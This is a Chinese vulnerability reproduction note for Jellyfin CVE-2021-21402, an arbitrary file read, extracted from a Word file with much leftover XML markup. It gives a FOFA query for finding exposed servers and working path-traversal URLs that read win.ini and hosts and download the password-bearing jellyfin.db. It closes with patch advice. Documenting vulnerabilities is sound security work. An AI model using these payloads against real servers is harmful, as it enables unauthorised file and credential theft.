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Jellyfin 任意文件读取漏洞（CVE-2021-21402）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Jellyfin是一个自由软件媒体系统。在10.7.1版本之前的Jellyfin中，对于某些端点，精心编制的请求将允许从Jellyfin服务器的文件系统读取任意文件。当使用Windows作为主机操作系统时，这个问题更为普遍。暴露于公共互联网的服务器有潜在的风险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漏洞影响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jellyfin&lt;=10.7.0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1）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:eastAsia="仿宋" w:cs="仿宋"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>fofa语句：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title="Jellyfin"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="256794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登录界面如下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="25647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构造POC</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>尝试读取win.ini文件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/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="27349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打开查看其内容</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="224091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尝试读取其他文件比如hosts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http:/you-ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5CSystem32%5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drivers%5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etc%5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hosts/stream.mp3/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2696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进一步利用从服务器下载带有密码的jellyfin.db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/Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="281749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6410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其他的需要自己去构造POC获取自己想要的信息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四、修复建议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1、10.7.1版中已修复。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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2、另一种解决方法，用户可以通过对文件系统强制执行严格的安全权限来限制某些访问，但是建议尽快更新。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DC684"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="94DDC6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12AE"/>
    <w:rsid w:val="02DC2BCB"/>
    <w:rsid w:val="03424908"/>
    <w:rsid w:val="055546D7"/>
    <w:rsid w:val="074D1117"/>
    <w:rsid w:val="07CA64A8"/>
    <w:rsid w:val="0C0C6C6E"/>
    <w:rsid w:val="128D2DF8"/>
    <w:rsid w:val="187E24F7"/>
    <w:rsid w:val="1ACA4CF5"/>
    <w:rsid w:val="20915B84"/>
    <w:rsid w:val="21E239B8"/>
    <w:rsid w:val="240F6A0F"/>
    <w:rsid w:val="286E0E20"/>
    <w:rsid w:val="291F5264"/>
    <w:rsid w:val="2AB9701A"/>
    <w:rsid w:val="2E5A7B3A"/>
    <w:rsid w:val="2EAF42EB"/>
    <w:rsid w:val="30476984"/>
    <w:rsid w:val="36B82129"/>
    <w:rsid w:val="385E1F47"/>
    <w:rsid w:val="3B1055DE"/>
    <w:rsid w:val="3B487824"/>
    <w:rsid w:val="3DA87992"/>
    <w:rsid w:val="42011453"/>
    <w:rsid w:val="42683D00"/>
    <w:rsid w:val="42EF2331"/>
    <w:rsid w:val="43776269"/>
    <w:rsid w:val="44C1214E"/>
    <w:rsid w:val="457E5532"/>
    <w:rsid w:val="4744497F"/>
    <w:rsid w:val="48184A12"/>
    <w:rsid w:val="491458EB"/>
    <w:rsid w:val="4B182E2C"/>
    <w:rsid w:val="4C662CCA"/>
    <w:rsid w:val="5AEB2CFC"/>
    <w:rsid w:val="63B4392A"/>
    <w:rsid w:val="64DB0FF9"/>
    <w:rsid w:val="6E2669AF"/>
    <w:rsid w:val="6F1A579E"/>
    <w:rsid w:val="71CB11B8"/>
    <w:rsid w:val="72D020F6"/>
    <w:rsid w:val="76724AA4"/>
    <w:rsid w:val="778B7DC6"/>
    <w:rsid w:val="7986790F"/>
    <w:rsid w:val="79D8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2021-04-08T01:42:00Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>wll</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-08T03:00:25Z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